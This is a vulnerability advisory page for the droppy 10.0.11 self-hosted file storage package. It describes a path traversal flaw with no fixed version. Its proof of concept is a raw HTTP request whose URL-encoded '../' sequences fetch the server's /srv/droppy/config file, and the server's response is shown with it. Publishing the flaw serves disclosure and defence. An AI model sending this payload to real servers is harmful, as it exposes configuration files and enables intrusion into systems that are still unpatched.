droppy@10.0.11 vulnerabilities

Self-hosted file storage

Direct Vulnerabilities

Known vulnerabilities in the droppy package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • M
Path Traversal

droppy is a library for self-hosted file storage.

Affected versions of this package are vulnerable to Path Traversal. It is possible to traverse directories to fetch configuration files from a droopy server.

PoC

GET /!/zip/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%73%72%76%2f%64%72%6f%70%70%79%2f%63%6f%6e%66%69%67 HTTP/1.1
Host: 192.168.0.11:8989
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: s=XtlnyU3If2YoVi8jiExHS++NwzrMpQMbmS0l/usCPJcH2J8S
Upgrade-Insecure-Requests: 1




HTTP/1.1 200 OK
Content-Type: text/plain
Content-Disposition: attachment; filename="config.zip"
Cache-Control: private, max-age=0
ETag: "4a-akoxq55ZKs8DpqVaiOcP6h8oCoI"
Date: Sun, 25 Oct 2020 18:27:10 GMT
Connection: close
Content-Length: 847


Backend Request: /!/zip/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../srv/droppy/config

How to fix Path Traversal?

There is no fixed version for droppy.

*